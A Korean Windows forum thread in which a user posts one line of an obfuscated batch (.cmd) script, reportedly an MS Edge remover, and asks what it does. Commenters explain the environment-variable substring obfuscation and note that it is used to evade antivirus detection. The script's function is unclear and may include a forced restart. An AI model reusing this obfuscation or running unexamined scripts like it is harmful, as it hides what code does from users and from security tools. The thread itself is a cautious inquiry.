윈 도 우 난독화된 cmd 파일 해석을 부탁드립니다
2022.11.10 03:58
https://windowsforum.kr/gallery/18666267
덧글에 글쓴이 분께서 cmd 파일을 올리셨는데, 받아서 열여보니 난독화가 되어 있습니다.
첫째 줄의 내용만 보면 대충 이러한데, 읽을 수가 없네요.
@%os:~6,1%%comspec:~26,1%%comspec:~-13,1%%programfiles:~10,1%'=^">%commonprogramfiles:~-7,1%u%commonprogramfiles:~-3,1%&@%programfiles:~-1,1%%comspec:~-12,1%%comspec:~-13,1%%commonprogramfiles:~23,1%%comspec:~14,1%%pathext:~41,1%=%pathext:~47,1%%programfiles:~-9,1%%pathext:~1,1%U&@%os:~6,1%%comspec:~15,1%%comspec:~14,1%%commonprogramfiles:~10,1%%programfiles:~13,1%%pathext:~26,1%%commonprogramfiles:~-22,1%L=%pathext:~31,1%Z%pathext:~32,1%&@%programfiles:~14,1%%comspec:~20,1%h%commonprogramfiles:~21,1%%commonprogramfiles:~-19,1%%os:~-6,1%ff&@%os:~-4,1%%comspec:~26,1%%comspec:~-13,1%%commonprogramfiles:~10,1%'=^^^\^^^%pathext:~7,1%f%commonprogramfiles:~22,1%^^^&^^^%pathext:~47,1%^^^Q^^^'^^^}^^^%pathext:~18,1%v^^^4^^^)%comspec:~-12,1%^^^^%comspec:~20,1%^^^%commonprogramfiles:~-12,1%^^^%comspec:~-9,1%^^^U^^^;^^^/^^^%pathext:~17,1%^^^$%os:~-9,1%k^^^=^^^6q^^^R^^^*%comspec:~25,1%^^^I^^^%programfiles:~-13,1%^^^{^^^Y^^^"%commonprogramfiles:~5,1%^^^Z^^^%pathext:~42,1%^^^1^^^,^^^Gbu^^^%pathext:~27,1%^^^<%commonprogramfiles:~9,1%%commonprogramfiles:~28,1%^^^%pathext:~12,1%^^^.^^^_^^^9%programfiles:~7,1%z^^^L%programfiles:~6,1%p^^^(^^^%os:~-2,1%^^^%pathext:~26,1%^^^~^^^>^^^?^^^:^^^%programfiles:~-6,1%j^^^`^^^+^^^%comspec:~-10,1%^^^-^^^#^^^%pathext:~2,1%^^^K^^^|h%os:~3,1%^^^8%commonprogramfiles:~13,1%^^^0^^^%pathext:~35,1%^^^]^^^5^^^[^^^7%comspec:~-15,1%^^^%pathext:~37,1%%comspec:~14,1%%os:~5,1%^^^%pathext:~36,1%%programfiles:~-8,1%^^^%pathext:~40,1%^^^@^^^%os:~-1,1%&@%programfiles:~-1,1%%commonprogramfiles:~27,1%%comspec:~-13,1%%commonprogramfiles:~13,1%%commonprogramfiles:~-24,1%%comspec:~-7,1%%programfiles:~-8,1%%commonprogramfiles:~-3,1%%commonprogramfiles:~-19,1%%comspec:~-3,1%%os:~2,1%%commonprogramfiles:~-21,1%b%commonprogramfiles:~13,1%%comspec:~15,1%%comspec:~22,1%%commonprogramfiles:~-2,1%%commonprogramfiles:~13,1%%programfiles:~-8,1%%comspec:~12,1%%programfiles:~14,1%%comspec:~-5,1%%comspec:~15,1%%comspec:~25,1%p%programfiles:~8,1%%commonprogramfiles:~22,1%%commonprogramfiles:~28,1%%commonprogramfiles:~12,1%%commonprogramfiles:~5,1%%commonprogramfiles:~22,1%&%comspec:~-1,1%%os:~2,1%%comspec:~-5,1%%programfiles:~13,1%%comspec:~-7,1%%programfiles:~-11,1%%programfiles:~8,1%%commonprogramfiles:~13,1%%commonprogramfiles:~10,1%%comspec:~18,1%>%os:~-8,1%u%commonprogramfiles:~-3,1%&&@%programfiles:~15,1%%comspec:~15,1%%comspec:~-13,1%%programfiles:~-6,1%%pathext:~35,1%%os:~3,1%%pathext:~12,1%%os:~-5,1%%os:~5,1%=f%pathext:~11,1%%pathext:~12,1%%pathext:~35,1%%comspec:~14,1%&@%commonprogramfiles:~28,1%%comspec:~-12,1%%comspec:~-13,1%%commonprogramfiles:~-19,1%p%commonprogramfiles:~22,1%=%pathext:~2,1%%pathext:~2,1%%os:~-5,1%%commonprogramfiles:~-18,1%&@%programfiles:~-2,1%%comspec:~20,1%h%commonprogramfiles:~-24,1%.>%0 &&@%commonprogramfiles:~-1,1%%comspec:~-12,1%%comspec:~-13,1%%programfiles:~10,1%%commonprogramfiles:~28,1%f%comspec:~-24,1%%programfiles:~-13,1%=%os:~-8,1%%pathext:~8,1%&@%os:~6,1%%comspec:~24,1%%comspec:~-13,1%%commonprogramfiles:~23,1%Z%pathext:~18,1%%pathext:~26,1%%comspec:~-15,1%%pathext:~2,1%=p%pathext:~31,1%&@%commonprogramfiles:~28,1%%commonprogramfiles:~-15,1%%comspec:~14,1%%programfiles:~10,1%%os:~-4,1%%commonprogramfiles:~11,1%%os:~2,1%=%pathext:~45,1%Z%pathext:~13,1%%comspec:~14,1%%os:~5,1%&@%comspec:~-16,1%hu%comspec:~14,1%%os:~3,1%%commonprogramfiles:~-24,1%%os:~5,1%%os:~-8,1%%commonprogramfiles:~10,1%/%comspec:~-16,1%%programfiles:~-6,1%/f%commonprogramfiles:~10,1%/%comspec:~-13,1%%commonprogramfiles:~10,1%0&&@%comspec:~-12,1%%comspec:~25,1%%programfiles:~12,1%%comspec:~14,1%&&@%comspec:~26,1%%comspec:~20,1%h%commonprogramfiles:~21,1%%commonprogramfiles:~-19,1%"
난독화가 되어 있는 연유는 모르겠지만, 최근 이러한 일이 있었던 만큼, 이러한 난독화는 겉보기에 상당히 위험해보입니다. 이 스크립트가 무엇을 하는지 전혀 알 수 없으니까요.
덧글에 있던 파일을 그대로 올려봅니다. 대체 어떤 방식으로 MS Edge가 제거되는 것인지 궁금하네요.
댓글 [7]
-
zerojiddu 2022.11.10 04:41 -
네오이즘 2022.11.10 05:40
만든 인간이 확실히 정신병자긴 하네요...
%os%는 환경변수로 "Windows_NT"가 출력이 되는데 %os:~6,1%는 6번째에서 한글자만 출력한다는 뜻이 되서 S가 됩니다.
글자를 이런식으로 하나하나 다 짤라서 명령어를 만들었다는건데.... 확실히 정신나간 짓이죠...
-
ojaykim 2022.11.10 09:28
전문가는 아니지만 글올리신분 말이 상당히 거칠군요...
위의 cmd를 누가 올린것인줄이나 알고 말씀하시는것인지요...?
이것 올린분은 따라큐님이라고 자료를 많이 올려주시는분입니다...
앞뒤,전후도 없이 정신병자라는 글을 올린분 이런글은 본인한테도 득될것은 없을것 같습니다...
-
콜라군 2022.11.10 10:56
누구건간에 일부러 난독화한 스크립트를 공개 게시판에 올리는 것은 경계할만하죠
의심할만한 기능이 없으면 그냥 평문으로 올리면 될 것인데 왜 난독화를 하나요
아니면 아예 컴파일을 하든지 했으면 됐을거 같은데요
-
DarknessAngel 2022.11.10 08:26
보통 방화벽 차단이나 백신 감지같은것 방지할려고 저렇게 한겁니다
보통 위험한 코드 저런식으로 숨깁니다
-
지룡자 2022.11.10 13:15
헉 좋은 팁 감사합니다
-
컨피그 2022.11.10 13:17
짧게 작성된 것도 아니고 저 많은 것을 일일이 타이핑해서 작성했다고 보기엔 너무 노가다 스럽겠고요
변환 프로그램을 먼저 만들고 그걸 이용해서 변환시킨듯 싶네요.
먼가 멋진 소스 구경 잘했네요.
상업용 수준의 오픈소스 프로그램도 소스를 투명하게 공개하는데,
뭐 대단하다고 배치파일을 난독화를 시키는지 전 이해가 안됩니다.
실행상, 난독화를 시켜야할 무슨 이유가 있는지도 전혀 모르겠구요.
열어보니, 짜증나는 쓰레기 파일 같아요.
구글링하면 오픈된 배치파일과 다른 스크립트가 더 많으니 쓰레기에 시간 낭비하지 마세요.